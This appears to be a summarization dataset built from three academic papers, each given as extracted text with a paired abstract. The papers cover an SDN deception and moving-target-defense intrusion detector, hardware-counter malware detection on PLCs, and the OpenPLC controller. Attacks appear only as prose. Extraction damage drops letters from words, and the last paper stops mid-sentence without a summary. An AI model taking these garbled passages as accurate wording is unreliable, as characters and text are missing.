and detect malicious actions early in the cybersecurity kill chain. For automation of deploying decoys, FoolYE is supported by two modules of Trap Inventory and Security Orchestrator . Firstly, Trap Inventory stores and manages traps packaged as docker images. These decoy objects are deployed in form of docker container running honeypots. Meanwhile, Security Orchestrator is built for deploying honeypots or decoys and observing malicious action in these cyber traps. At the machine assi gned as a decoy, a honeypot image from Docker Registry [20] is pulled and deployed into hosts randomly by Ansible through SSH connection. This approach can facilitate the flexibility for a cyber deception system. We can perform tasks of deploying or revoking traps, then run on other decoy hosts. We design two types of mechanisms called fixed trap and moving trap. x Fixed trap: Honeypots are permanently deployed in a host in the network. We can choose a type of honeypots or use the random mechanism to deploy cyber traps. x Moving trap: Honeypots are deployed automatically in the network. After a certain time, FoolYE framework conducts a moving strategy to renew decoys by changing honeypot type or deployment platform (hosts). C. Moving Target Defense Moving target defense (MTD), one of the game-changing themes to alter the asymmetric situation between attacks and defenses in cybersecurity, facilitates proactive defense strategies that are diverse and that continually shift attack surfaces in some fashion and change over time. In addition to cyber deception, we also apply MTD strategy aiming to impede adversaries from targeting and executing successful attacks by increasing complexity, chaos, and co st for attackers. It can help to limit the exposure of vulnerabilities and opportunities for attack, deceive adversaries in real time. Specifically, there is a list of available IP addresses in the network topology that are mutated by virtual IP addresses by MTD module. The MTD-based proactive technique is integrated with SDN controller to help the switch understand what virtual IP addresses implies to which real ones. The mapping process between real and virtual IP address is repeatedly conducted after a certain period of x seconds. The changes in IP leads to invalidate the reconnaissance information for attackers. IV. E XPERIMENTS This section provides the de tails of SDN testbed settings, followed by the experiment results through different scenarios. A. Training ML-Based IDS To train the ML-based IDS, we utilize a physical machine with configuration of RAM 64GB, CPU Intel i7 6700HQ, 03xGPU GTX 1050ti 4GB. We choose CICIDS2018 dataset [18] with DDoS attacks to evaluate the performance of ML-based IDS. Specifically, four .CSV files in this dataset including Thurs-15-02-2018, Fri-16-02-2018, Tues-20-02-2018, Wed-21-02-2018 are combined, then split into train set and test set with ratio of 80% and 20% respectively. Two outstanding neural networks consisting of ResNet50 and DenseNet161 are deployed by Pytorch [21]. Following that, they are trained with 10 epochs, the learning rate of 0.001, cross entropy as loss function, and Adam optimizer. The training results after 10 epochs are shown in the Table I . In the future, collected malicious activities of adversaries from decoys can be utilized to train and update the knowledge of IDS about the real-world attack patterns in the network. B. Experiment Settings In the experimental environment, we use 2 virtual machines (VM) running Ubuntu 18.04 to construct an SDN testbed and other components. Table II illustrates the configuration of components in our framework. Initially, the SDN testbed, as depicted in Fig. 3 , is built with Ryu controller [22] and Containernet [23]. Containernet is a Mininet version [24] allowing Docker containers to be emulated as hosts in SDN-enabled networks. The network topology comprises 4 OpenFlow-supported switches, known as OpenvSwitch, connecting with 8, 12, 16 hosts in different experimental testing. In terms of cyber deception, we use 3 types of honeypots, namely Opencanary [25], Cowrie [26], Dionaea [27] to deploy decoy objects in the network. They are packed in Docker images, shown in Table III supporting easy installation as a container in decoy zone later. Note that, despite of just only deploying 3 types of honeypots in this experiment, hundreds of other decoy Docker images can be created. We use Playbook in Ansible [28] to deploy automatic traps with two mechanisms of fixed trap and moving trap. In the fixed type, administrator chooses a honeypot to be installed at a specific location for luring attackers until the administrator turns off or changes them to other types. On the contrary, in the moving strategy, various types of traps are selected to automatically deploy on different deceptive hosts. Then, they are continually changing to another type after a scheduled period. TABLE I. RESULTS OF DEEP TRANSFER LEARNING MODELS ON CICIDS2018 Model Performance on Test Set Accuracy (%) F1-score (%) 30 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:15 UTC from IEEE Xplore. Restrictions apply. Model Performance on Test Set Accuracy (%) F1-score (%) ResNet50 99.79 99.8 DenseNet161 99.44 99.5 TABLE II. EXPERIMENTAL SETTINGS ON VIRTUAL MACHINES # VM 1 VM 2 Hardware configuration Intel (R) Xeon(R) CPU E5- 2660 2.0GHz, 160GB HDD, 16GB RAM Intel (R) Xeon(R) CPU E5- 2660 2.0GHz, 100GB HDD, 4GB RAM Application Ryu controller, MTD module, RabbitMQ, ML-based IDS Containernet, Feature extraction module, Ansible, Snort3 Fig. 3. Experimental SDN-enabled network testbed. For ML-based IDS, ResNet50 and DenseNet161 are used as the prediction models. Each of them is loaded in the IDS programmed by Python language. The network traffic is captured and extracted by TCPDump_and_CICFlowMeter tool [29] and sent asynchronously by RabbitMQ [30] to ML-based IDS for getting the classification result. In addition, MTD is programmed as a module of SDN controller. Therein, real IP addresses are available to hosts but hidden to outsider attacker to avoid reconnaissance attacks from the outside. In contrast, a virtual IP address is an IP representing host, which will be changed continuously. To meet the demand for monitoring and giving notice of the cyber deception system, we utilize Snort [31] in the host VM playing the role of Security Orchestrator. Snort rules are installed to monitor network traffic sent from cyber deception system, namely DDoS attack and SSH connection attempts. Any security events violating the security policy established by Snort rules will be produce an alert for network security administrator. TABLE III. COMPRESSED SIZE AND PULLED SIZE OF THE IMAGES CONTAINING THE TRAPS # Opencanary Cowrie Dionaea Compressed size 206.67 MB 114.66 MB 59.87 MB Pulled size 632 MB 432 MB 194 MB C. Experiment Results To evaluate the built-in the ability of identifying attacks, we perform a DoS attack on a Web server with service port 80, by sending 100 HTTP requests per second. For the assessment of attack detection capabilities, we use statistical methods. For every 100 records received, the ML-based IDS calculates the percentage of attack flows in the total network traffic. There are approximately 60% of attack flows can be detected by both ResNet50 and DenseNet161 model in this test. Meanwhile, the average time of flow record prediction by ResNet50 and DenseNet161 is around 1.93 records/s, and 2.12 records/s, respectively. The number of records in this evaluation per second will be proportional to the hardware configuration because the recognition speed of the model is greatly affected by the CPU, RAM, or GPU of the VM. When it comes to deployment time of traps, we take 30 measurements and record the time in seconds. The experiments are performed with 2, 3, and 4 traps. In each group of traps, results of the experiments are shown in Table IV . Time consumption of trap deployment includes time waste of host selection, pulling honeypot images from Docker registry (storage), starting containers for all honeypots in the group. To show the effectiveness of network monitoring on deployed honeypots, we conduct a test case on Opencanary trap by logging and analyzing attacker s actions. An adversary performs a scanning attack and getting active services running on a specific host. Following that, they attempt to explore and exploit the fake target built by Opencanary. Such trails coming from decoys are monitored and shown in the real-time under the view of Security Orchestrator machine, as depicted in Fig. 4. TABLE IV. TIME CONSUMPTION OF HONEYPOT DEPLOYMENT IN 30 EXPERIMENTS Number of honeypots Maximum time (s) Minimum time (s) Average time (s) 2 200.2 136.8 163.2 3 330.5 159.9 236.7 4 468.6 166.1 268.2 Fig. 4. Log monitoring from Opencanary honeypot. TABLE V. TIME CONSUMPTION AND THE NUMBER OF DISCOVERED HOSTS ON SCANNING PROCESS USING MTD AND NON-MTD Total hosts MTD Non-MTD Scanning Time (s) Discovered hosts Scanning Time (s) Discovered hosts 8 5524 7 969 8 12 6948 9 1059 12 16 9837 13 1206 16 31 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:15 UTC from IEEE Xplore. Restrictions apply. Regarding the performance of MTD mechanism on changing attack surfaces, we use nmap tool [32] to scan the network in both cases of MTD and non-MTD integration. The results, as illustrated in Table V , prove that by forcing MTD strategy, it does not take a long time for attacker to finish reconnaissance attacks but also miss useful network information. V. C ONCLUSION AND FUTURE WORKS To improve the effectiveness of cyber defense in SDN- enabled network, we introduce a deception-enhanced intrusion detection system, named FoolYE for deploying traps and decoys to lure attackers. By leveraging the essence of SDN, these traps are continually created, monitored, and easily changed to create more deceptive attack surfaces. With the matrix of decoys and Moving Target Defense, it takes network intruder to spend more time and effort in counterfeit assets while early giving security analysts about the attacker presence in the network. Furthermore, behaviors of adversaries in the decoy systems are collected for training IDS to meet requirements of detecting skillful cyberattacks in the real-world scenarios. In the future, we intend to utilize the honey patches which are real assets turning out the rich-environment trap. Next, the evaluation from red teams is considered to further validate the feasibility of our framework in the real-world scenarios. A CKNOWLEDGMENT This research is funded by Vietnam National University HoChiMinh City (VNU-HCM) under grant number DS2022- 26-02. Phan The Duy was funded by Vingroup JSC and supported by the Domestic Master, PhD Scholarship Programme of Vingroup Innovation Foundation (VINIF), Institute of Big Data, code VINIF.2021.TS.152. R EFERENCES [1] P. P. Ray, N. Kumar, "SDN/NFV architectures for edge-cloud oriented IoT: A systematic review," Computer Communications, vol. 169, 2021. [2] I. Alam, K. Sharif, F. Li, Z. Latif, M. M. Karim, S. Biswa, B. Nour and Y. Wang, "A Survey of Network Virtualization Techniques for Internet of Things Using SDN and NFV," ACM Computing Surveys, 2020. [3] W. Sun, "The Art of War," in Me ns sana, Knaur, M nchen., 2001. [4] D. Fraunholz, S. D. Anton, C. Lipps, D. Reti, D. Krohmer, F. Pohl, M. Tammen and H. D. Schotten, "Demy stifying Deception Technology:A Survey," in arXiv:1804.06196, 2018. [5] G.-l. Cai, B.-s. Wang, W. Hu and T.-z. Wang, "Moving target defense: state of the art and characteristics., " Frontiers Inf Techno l Electronic Eng, vol. 17, p. 1122 1153 , 2016. [6] S. Sengupta, A. Chowdhary, A. Sabur, A. Alshamrani, D. Huang and S. Kambhampati, "A Survey of Moving Target Defenses for Network Security," IEEE Communications Su rveys & Tutorials, vol. 22, 2020. [7] H. Wang and B. Wu, "SDN-based hy brid honeypot for attack capture," in 2019 IEEE 3rd ITNEC, 2019, . [8] N. Cifranic, R. A. Hallman, J. Rome ro-Mariona, B. Souza, T. Calton and Giancarlo Coca, "Decepti-SCADA: A cyber deception framework for active defense of networked critical infr astructures," Internet of Things, vol. 12, 2020. [9] R. Dahbul, C. Lim and J. Purnama, "Enhancing Honeypot Deception Capability Through Network Service Fingerprinting," Journal of Physics Conference Series, 2017. [10] X. Luo, Q. Yan, M. Wang and W. Huang, "Using MTD and SDN-based Honeypots to Defend DDoS Attacks in IoT," in ComComAp, 2019. [11] D. Miao and W. Kun, "An SDN-Ena bled Pseudo-Honeypot Strategy for Distributed Denial of Service Attacks in Industrial Internet of Things," IEEE Transactions on Industrial In formatics , vol. 16, 2019. [12] M. Ge, J.-H. Cho, D. S. Kim, G. Dixit and I.-R. Chen, "Proactive Defense for Internet-of-Things: Integrating Moving Target Defense with Cyberdeception," in arXiv prepr int arXiv:2005.04220, 2020. [13] A. Kanellopoulos and K. G. Vam voudakis, "A Moving Target Defense Control Framework for Cyber-Physi cal Systems," IEEE Transactions on Automatic Control , vol. 65, no. 3, pp. 1029 - 1043, 2020. [14] A. Frederico, A. Gbadebo, A.-N. Khaled, G. Yang, H. K. W., K. Latifur, "Improving intrusion detectors by cr ook-sourcing," in ACSAC, 2019. [15] Q. Duan, E. Al-Shaer, M. Islam and H. Jafarian, "CONCEAL: A Strategy Composition for Resilient Cyber Deception-Framework, Metrics and Deployment," in 2018 IEEE CNS, Beijing, China, 2018. [16] T. Tang, D. McLernon, L. Mhamdi, S. Zaidi and M. Ghogho, "Intrusion Detection in SDN-Based Networks: Deep Recurrent Neural Network Approach," in In: Alazab M., Tang M. (eds) Deep Learning Applications for Cyber Security. Advanced Sciences and Technologies for Security Applications, Springer, Cham, 2019. [17] A. H. L. Iman Sharafaldin, "A Detailed Analy sis of the CICIDS2017 Data Set," in Communications in Computer and Information Science, vol. 977, CCIS, 2019. [18] I. Sharafaldin, A. H. Lashkari and A. A. Ghorbani, "Toward Generating a New Intrusion Detection Dataset and Intrusion Traffic Characterization," in 4th ICISSP, Portugal, 2018. [19] Z. Li, Z. Qin, K. Huang, X. Yang and S. Ye, "Intrusion Detection Using Convolutional Neural Networks for Representation Learning," in Lecture Notes in Computer Science, vol. 10638, LNCS. [20] "Docker Registry," [Online]. Available: https://docs.docker.com/registry/. [21] "PyTorch," [Online]. Availab le: https://pytorch.org/. [22] "Ryu SDN Controller," [Online]. Available: https://ryu-sdn.org/. [23] "Containernet: Use Docker containers as hosts in Mininet emulations.," [Online]. Available: https://co ntainernet.github.io/. [24] "An Instant Virtual Network on your Laptop (or other PC)," Mininet, [Online]. Available: http://mininet.org/. [25] "OpenCanary," [Online]. Available: https://opencanary.readthedocs.io/en/latest/. [26] "Cowrie," [Online]. Available: https://cowrie.readthedocs.io/en/latest/index.html. [27] "Dionaea honeypot," [Online]. Available: https://dionaea.readthedocs.io/. [28] "Playbook in Ansible," [Online]. Available: https://docs.ansible.com/ansible/lates t/user_guide/playbooks_intro.html. [29] "TCPDUMP_and_CICFlowMeter," [Online]. Available: https://github.com/iPAS/TCPDUMP_and_CICFlowMeter. [30] "RabbitMQ," RabbitMQ || VMWare, Dec 2020. [Online]. Available: https://www.rabbitmq.com/. [31] "Snort - Network Intrusion Detection & Prevention System," [Online]. Available: https://www.snort.org/. [32] "Nmap: the Network Mapper - Free Security Scanner," [Online]. Available: https://nmap.org/. 32 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:15 UTC from IEEE Xplore. Restrictions apply.
Summary:
The adoption of deception technology constructed to throw off stealthy attackers from real assets and gather intelligence about how they operate is gaining ground in the network system. Also, some static honeypots are deployed in the network system to attract adversaries for avoiding them accessing the real targets. This leads to a disclosure of the existence of cyber traps in the network that do not fool skillful attackers. Meanwhile, there are many intrusion detection systems (IDS) lack the abnormal traffic s ample to obtain the knowledge of cyberattacks. Hence, it is vital to make honeypots more dynamically and give the material for harvesting useful threat intelligence for detector. Taking advantage of Software Defined Networking (SDN), cyber traps can be easily deployed when an intrusion detector triggers or actively laid in advance to mitigate the impact of adversaries into real assets. Instead of building IDS separately or blocking attacks pr omptly after an alert issued, in this paper, we utilize the strate gy of associating Cyber Deception, and Moving Target Defense (MTD) with IDS in SDN, named FoolYE (Fool your enemies) to slow a network intruder down and leverage the behaviors of adversaries on traps for feeding back detector awareness.
|
Summarize:
Index Terms Anomaly detection, cyber security, program- mable logic controller, malware, resilient control. I. I NTRODUCTION CYBER-SECURITY for cyber-physical systems (CPS) and industrial control systems (ICS) is becoming increas- ingly important [1] [3]. Several attacks on CPS/ICS have been reported [4] [14]. While general-purpose computer and net-work security approaches apply to CPS, leveraging the tempo- ral behavior and code structure characteristics of CPS devices can offer complementary solutions. We present a lightweight (i.e., zero-hardware-cost) met hod for malware characterization and detection in CPS devices using the Hardware PerformanceCounters (HPCs) digital side channel. HPCs are special-purpose registers embedded in almost all processors (including Intel, ARM, and PowerPC) and counthardware events such as number of instructions retired, num- ber of branches taken, and other low-level processor events of Manuscript received January 17, 2019; revised May 28, 2019; accepted May 29, 2019. Date of publication June 17, 2019; date of current version September 24, 2019. This work was supported in part by the U.S. Of ce of Naval Research under Grant N00014-15-1-2182 and GrantN00014-17-1-2006 and in part by Defen se Advanced Research Projects Agency under Air Force Research La boratory (AFRL) Contract FA8750-16- C-0179. The associate editor coordinating the review of this manuscript and approving it for publication was Prof. Chip-Hong Chang. (Corresponding author: Prashanth Krishnamurthy.) The authors are with the Department of Electrical and Computer Engineer- ing, NYU Tandon School of Engineering, Brooklyn, NY 11201 USA (e-mail:prashanth.krishnamurthy@nyu.edu; rkarri@nyu.edu; khorrami@nyu.edu). Digital Object Identi er 10.1109/TIFS.2019.2923577applications running on the processor. HPCs provide in-depth performance information of software without modifying the source code. The speci c HPCs available depends on theparticular processor archit ecture. HPC measurements can be accumulated over the time intervals between successive HPC measurements. A time series o f HPC measurements offers a temporal pro le of the code being executed. Given a known- good embedded device, the HPC time series characterizes the expected temporal characteristics of the code on the embedded processor when it is running the expected code. This paper develops a lightweight method (Figure 1) to detectanomalies using machine learni ng classi cation of real-time HPC measurements. While this implementation considers HPC measurements via software on the embedded device, HPC measurements can also be relayed onto a digital output and remotely collected. This can be done by a kernel module on the device or a dedicated hardware port. One motivation of this study is to demonstrate ef cacy of HPC-bas ed monitoring of real-time embedded processes and make a case for hardware support for continuous HPC monitoring in next-generation processors. A monitor can be interfaced to the embedded processor via adedicated hardware port to enable arms-length monitoring. A. Key Contributions and Novelty of the Approach This paper presents real-time anomaly detection in multi-threaded processes (e.g., controller, sensor processing, and sensor fusion implementations) in embedded PLCs. Fea-tures extracted from the multidimensional HPC time series of the target process are classi ed using machine learning to detect mismatches between observed and baseline temporal behavior. Time series of HPC measurements collected from the device under known-good cond itions are used without requir- ing anomalous data. The trained anomaly detector detects malware/modi cations that have not been seen before. The approach is applied to controllers running in a PLC in a HITLtestbed of an ICS. We show that several modi cations can be detected using the approach. While HPC-based anomaly detection has been considered in prior works (e.g., [15] [29] see Section I-B: Related Work), a crucial novelty of the proposed approach is thatthe primary focus is on real-time multithreaded processes on embedded devices in CPS and enabling continuous monitoring of time series of multi-thread HPC readings of such real-timeprocesses. For this purpose, novel aspects of the proposed approach include: 1556-6013 2019 I EEE. Personal u se is perm itted, but republication/redistri bution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:43 UTC from IEEE Xplore. Restrictions apply. KRISHNAMURTHY et al. : ANOMALY DETECTION IN REAL-TIME M ULTI-THREADED PROCESSES 667 Fig. 1. Overall structure of the machine learning based malware detection and characterization system. An algorithmic methodology that applies to multi-threaded processes wherein the multiple threads could run with vastly different load characteristics and could have a mix of timing-based and event- triggered/interrupt-drive n components. Multi-threaded processes are typical in real-time embedded controllers. For example, control implementations on PLCs typically use separate threads for analog and digitalinputs, for network communication with other PLCs, human-machine interfaces (HMI), and user-de ned control algorithms. An approach to detect malware (or unexpected modi ca- tions of the target process) that was not previously seen. The approach does not require malware signatures and uses known-good data from baseline device operation. A blackbox ( outside-the-process ) approach to real-time monitoring of unmodi ed processes for which source code is unavailable. HPC measurements are collected by a separate process using kernel-level methods. Themonitored process is not inst rumented and hence its oper- ation remains unmodi ed. By using a machine learning based time-series classi er, the approach is oblivious to the structure of the process. The anomaly detector uses time windows of the HPC measurements withoutassuming timing synchronization and hence does not require temporal alignment of the HPC measurement time series with any internal structure of the process. The anomaly detector considers the multi-threaded struc- ture of the target process. Th e HPCs from each thread are measured separately at each sampling instant to create a vector of HPC measurements for each thread. The matrix generated from these HPC sensor measurement vectorsover a sliding window of time as a multidimensional HPC sensor input is used to extract low-dimension features. Feature extraction consider s per-thread and cross-thread features. While per-thread f eatures model activity patterns within the threads, cross-th read features model temporal relationships among activity patterns between threads. B. Related Work Cyber-security of CPS has been addressed in several works (e.g., [1] [3] and
Summary:
We propose a novel methodology for real-time monitoring of software running on embedded processors incyber-physical systems (CPS). The approach uses real-time mon-itoring of hardware performance counters (HPC) and appliesto multi-threaded and interrupt-driven processes typical in pro-grammable logic controller (PLC) implementation of real-timecontrollers. The methodology uses a black-box approach topro le the target process using HPCs. The time series of HPCmeasurements over a time window under known- good operating conditions is used to train a machine learning classi er. At run-time, this trained classi er classi es the time series of HPCmeasurements as baseline (i.e., probabilistically correspondingto a model learned from the training data) or anomalous. Thebaseline versus anomalous labels over successive time windowsoffer robustness against the stochastic variability of code execu-tion on the embedded processor and detect code modi cations.We demonstrate effectiveness of the approach on an embeddedPLC in a hardware-in-the-loop (HITL) testbed emulating abenchmark industrial process. In addition, to illustrate thescalability of the approach, we also apply the methodology toa second PLC platform running a representative embeddedcontrol process.
|
Summarize:
Keywords PLC; OpenPLC; Automation; MODBUS; Open source I. INTRODUCTION In early 60s, industrial automation was usually composed of electromechanical parts like relays, cam timers and drum sequencers. They were interconn ected in electrical circuits to perform the logical control of a machine. To change a machine logic was to make an intervention on its electrical circuit, which was a long and complicated process. In 1968, the Hydra-Matic of General Motors requested proposals for an electronic replacement for hard-wired relay systems. The winning proposal came from Bedford Associates with their 084 project. The 084 was a digital controller made to be tolerant to plant floor conditions, and was latter known as a Programmable Logic Controller, or simply PLC [1]. Within a few years, the PLC started to spread all over the automotive industry, replacing relay logic machines as an easier and cheaper solution, a nd becoming a standard for industrial automation. There is a strict relation between automation and development. In less developed countries, the greatest barriers are knowledge and cost. Industrial controllers are still very expensive. Companies don t provide detailed information about how these controllers work internally as they are all closed source. The OpenPLC was created to break these two barriers, as it is fully open source and open hardware. It means that anyone can have access to all pro ject files and information for free. This kind of project helps spread technology and knowledge to places that need t he most. Also, the OpenPLC is made with inexpensive components to lower its costs, opening doors to automation where it wasn t ever possible before. II. T HE PLC ARCHITECTURE The PLC, being a digital controller, shares common terms with typical PCs, like CPU, memory, bus and expansion. But there are two aspects of the PLC that differentiate them from standard computers. The first one is that its hardware must be sturdy enough to survive a rugged industrial atmosphere. The second is that its software must be real time. A. Hardware With the exception of Brick PLCs that are not modular, the hardware of a usual PLC can be divided into five basic components: Rack Power Supply CPU [Central Processing Unit] Inputs Outputs Like a human spine, the rack has a backplane at the rear allowing communication between every PLC module. The power supply plugs into the rack providing a regulated DC power to the system. The CPU is probably the most important module of a PLC. It is responsible for processing the information received from input modules and, according to the programmed logic, send impulses to the output modules. The CPU holds its program on a permanent storage, and uses volatile memory to perform operations. The logic stored in CPU s memory is continuously processed in an infinite loop. The time needed to complete a cycle of the infinite loop is called scan time. A faster CPU can achieve shorter scan time. Input modules are used to read signals of sensors installed at the field. There are many types of input modules, depending on the sensor to be read, but they can generally be split into two categories: analog and di gital. Digital input modules can handle discrete signals, generated by devices that are either on or off. Analog input modules convert a physical quan tity to a digital number that can be processed by the CPU. This process of conversion is usually made by an ADC [Analog to Digital Converter] inside the analog input module. The type of the physical quantity to be read determines the type of the analog input module. For example, depending on the sensor, the physical value can be expressed in voltage, current , resistance or capacitance. Similarly to the input modules, output modules can control devices installed at the field. Digital output modules 978-1-4799-7193-0/14/$31.00 2014 IEEE 585 IEEE 2014 Global Humanitarian Technology Conference Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:57 UTC from IEEE Xplore. Restrictions apply. can control devices as if on-off switches. Analog output modules can send different values of voltage or current to control position, power, pressure or any other physical parameter. As the most significant feature of a PLC is robustness, each module must be designed with protections such as short circuit, over current and over voltage protections. It is also important to include filter against RF noise. B. Software PCs, by design, are made to handle different tasks at the same time. However, they have difficulty handling real time events. To have an effective cont rol, PLCs must be real time. A good definition of real time is any information processing activity or system which has to respond to externally generated input stimuli within a finite and specified period [2]. Real time systems don t nece ssarily mean to be fast. They just need to give an answer bef ore the specified period known as deadline. Systems without real time facilities cannot guarantee a response within any t imeframe. The deadline of a PLC is its scan time, so that all responses must be given before or at the moment scan reaches the end of the loop. There are many accepted langua ges to program a PLC, but the most widely used is called ladder logic, which follows the IEC 61131-3 standard [3]. Ladder logic (see Fig. 1) was originally created to document the design and construction of relay logic circuits. The name came from the observation that these diagrams resemble ladders, with two vertical bars representing rails and many horizontal rungs between them. These electrical schematics evolved into a programming language right after the creation of the PLC, allowing technicians and electrical engi neers to develop software without additional training to learn a computer language, such as C, BASIC or FORTRAN. Fig. 1. Example of a ladder logic diagram Every rung in the ladder logic represents a rule to the program. When implemented with relays and other electromechanical devices , all the rules execute simultaneously. However, when the diagram is implemented in software using a PLC, every rung is processed sequentially i n a c o n t i n u o u s l o o p ( s c a n ) . T h e s c a n i s c o m p o s e d o f t h r e e phases: 1) reading inputs, 2) processing ladder rungs, 3) activating outputs. To achieve t he effect of simultaneous and immediate execution, outputs are all toggled at the same time at the end of the scan cycle. III. T HE OPENPLC HARDWARE ARCHITECTURE The OpenPLC (see Fig. 2) was created based on the architecture of actual PLCs on the market. It is a modular system, with expansion capabilities, an RS-485 bus for communication between modules and hardware protections. To create the first OpenPLC prototype, four boards were built: Bus Board CPU Card Input Card Output Card Fig. 2. The OpenPLC Prototype A. Bus Board The bus board acts like a rack, with an integrated 5VDC power supply. Each module connects to the bus board through a DB-25 connector. The communication between modules is made over an RS-485 bus, whose lines are on the bus board. Caution was taken, while routing the RS-485 lines, to avoid communication problems. Fig. 3 shows the pins and connections of each slot of the bus board. The 24V and RS-485 ground was separated from the rest of the circuit ground to isolate short circuits on these lines. T o a l l o w m o r e c u r r e n t t o f l o w t h r o u g h t h e p o w e r l i n e s , the respective pins were duplicat ed. Three pins were used for physical address, so that the module connected on a particular slot would know its physical position on the bus board. These pins were called D0, D1 and D2, being hardcoded with logic 1 or 0 in a binary sequence, creating different numbers from 0 to 7, one number for each slot. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:57 UTC from IEEE Xplore. Restrictions apply. Fig. 3. Bus Board DB-25 connections B. CPU Card The OpenPLC s brain is the CPU card. It was important to use a processor that was inexpensive, fast enough to handle all PLC operations, and most importantly, actively supported by the open source community. After some research, the processor selected was the AVR ATmega2560. This microcontroller is a high-performance, low-power Atmel 8-bit AVR RISC-based microcontroller that combines 256KB ISP flash memory, 8KB SRAM, 4KB EEPROM, 86 general purpose I/O lines, 32 general purpose working registers, real time counter, six flexible timer/counters with compare modes, PWM, 4 USARTs, byte oriented 2-wire serial interface, 16-channel 10-bit A/D converter, and a JTAG interface for on-chip debugging. The device achieves a throughput of 16 MIPS at 16 MHz and operates b etween 4.5-5.5 volts [4]. The biggest reason for this choice was that the ATmega2560 is used on the Arduino family [5], a large open source community for rapid electronic prototyping, with an advanced programming language called Wiring. By using this processor we made the OpenPLC compatible with Arduino code, including hundreds of libraries written for it. The CPU card also includes another important IC (Integrated Circuit), the Wizn et W5100, responsible for Ethernet communication. The Wiznet W5100 supports hardwired TCP/IP Protocols like TCP, UDP, ICMP, IPv4 ARP, IGMP, PPPoE and Ethernet 10BaseT/100BaseTX, has 16KB of internal memory for Tx/Rx buffers and accepts serial (over SPI) or parallel interface. This is also the Ardui no Ethernet Shield official IC, enabling us to reuse all the code written for it on the OpenPLC. In order to communicate w ith the PC and download programs, the OpenPLC uses an USB port. The FT232RL from FTDI Devices converts Serial Rx/Tx lines to USB standard. The Arduino Mega bootloader is used to upload code to the CPU over the USB circuit. C. Input Card The Input card is a digital input module for the OpenPLC. To process the digital inputs r ead by the conditioning signal circuit and send them to the CPU card, the input card uses the AVR ATmega328P, a microcontroller with the same core of the CPU card. This made the reutilization of parts of code written for the CPU card, especially code related to communication over the RS-485 bus possible. The input signal conditioning circuit is composed mainly by an optocoupler, used to isolate the input signals and the control signals. The circuit of each input can be seen on Fig. 4. When a stimulus is made between E1+ and E1-, a current flow through the input resistor and activates the internal LED of the optocoupler. The photons emitted by the internal LED are sensed by the phototransisto r, which creates a path for the current from 5VCD to ground, sending logic 0 to inverter s input. As the inverter must invert the logic signal, a logic 1 is received by the microcontroller, indicating that a digital stimulus was made at the input. The input card has 8 isolated input circuits, so that each module can read up to 8 digital signals at the same time. The state of each input is sent to the CPU card, over the RS-485 bus, to be processed according to the ladder logic. Fig. 4. Isolated input circuit from the Input Card D. Output Card Each Output card has 8 relay-b ased outputs driving up to 8 loads at the same time. It has double isolated outputs, as they are isolated by an optocoupler (just like the Input card) and the relay itself, which gives an additional layer of isolation. Fig. 5 shows the circuit of one isolated output from the Output card. As digital processors are better sinking current than sourcing, the cathode of the optocoupler s internal LED is connected to an output pin on the ATmega328P. While the output pin remains with logic 1, no current flows through the LED. If the output pin goes to logic 0, a current is drawn on that pin, activating the optocoupler s internal LED. The internal phototransistor is connected to an external BC817 transistor in a Darlington configuration to increase gain. When photons are sensed by the internal phototransistor, both transistors are polarized, energizing the relay s coil. Without photons, there isn t any current flowing through the coil, and the relay remains off. Fig. 5. Isolated output circuit from the Output Card Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:57 UTC from IEEE Xplore. Restrictions apply. E. Protections There are five types of protections used in the OpenPLC circuit: Current limiting protection with PPTC [Polymeric Positive Temperature Coefficient] Over-voltage protection with TVS [Transient Voltage Suppression diode] Ground isolation Reverse polarity protection Noise filters Every input and output (including the power input at the Bus board) has protection against over-voltage and short circuit. These protections are achieved by using a PPTC in series with the circuit input and a TVS diode in parallel. When a high current flows through the PPTC, it reaches a high resistance with a low holding current, protecting the circuit in series. When the current is removed, it cycles back to a conductive state, enabling the circuit to work properly. Optocouplers and relays were used to isolate high power circuits from control logic. The filled zones were connected to ground and only the low power zones of the board were filled. To isolate the communication and 24V grounds from the filled zone, zero ohm resistors were used. To protect against reverse polarity on inputs, diodes were connected in series to allow current flow in only one direction. Also, capacitors were used in parallel to ground to filter noise from sensitive devices. IV. T HE OPENPLC SOFTWARE ARCHITECTURE What differentiates a PLC fro m any other robust digital controller is its ability to be programmed in some standardized languages. Accord ing to [3], the IEC 61131-3 standard defines five languages on which PLCs can be programmed: FBD [Function Block Diagram] Ladder Diagram Structured Text Instruction List SFC [Sequential Function Chart] The most widely used language in PLC is the Ladder Diagram. PLCs from different manufacturers might not have all the five programming languages available, but they certainly have the Ladder Diag ram as one of the options. For this reason, it was important to develop a software t h a t w a s a b l e t o c o m p i l e a l a d d e r d i a g r a m i n t o a c o d e t h a t could be understood by the CPU of the OpenPLC. The solution was partially based on LDmicro [6], an open source ladder editor, simulator and compiler for 8-bit microcontrollers. It generates native code for Atmel AVR and Microchip PIC16 CPUs from a ladder diagram. Unfortunately, the OpenPLC CPU uses the ATmega2560, which is not supported by the original LDmicro software. Also, the generated code contains only the ladder logic converted to assembly instructions. The OpenPLC has many other functions to perform, such as communication over Ethernet for MODBUS-TCP supervisory systems, RS-485 and USB, individual modules control, error messages generation and so on. For this reason, it was necessary to create an intermediate step before the final compilation in which the ladder diagram had to be combined with the OpenPLC firmware. Doing so, the final program would contain both the ladder logic and the OpenPLC functions. One of the outputs generated by the LDmicro for the Ladder Diagram was ANSI C code. So, instead of having machine code f or a specific processor, an ANSI C code that could be compiled for any platform was generated. The only thing that had to be provided using this method was a C header to link the generated ANSI C functions and the target system. The OpenPLC Ladder Editor (Fig. 6) was created to fulfill these tasks. Basically, the OpenPLC Ladder Editor is a modified version of the LDmicro, with reduced instructions (processor-specific instructions had to be removed), no support to direct compiling (it only generates ANSI C code) and a tool that can automatically link the generated ANSI C code with the OpenPLC firmware, compile everything using AVR GCC and upload the compiled software to the OpenPLC. The compiler tool is called every time the compile button is clicked. While the code for the LDmicro was created using C++, the compilation tool was created using C# .net, a very robust and modern language. The final result is a binary program uploaded to the 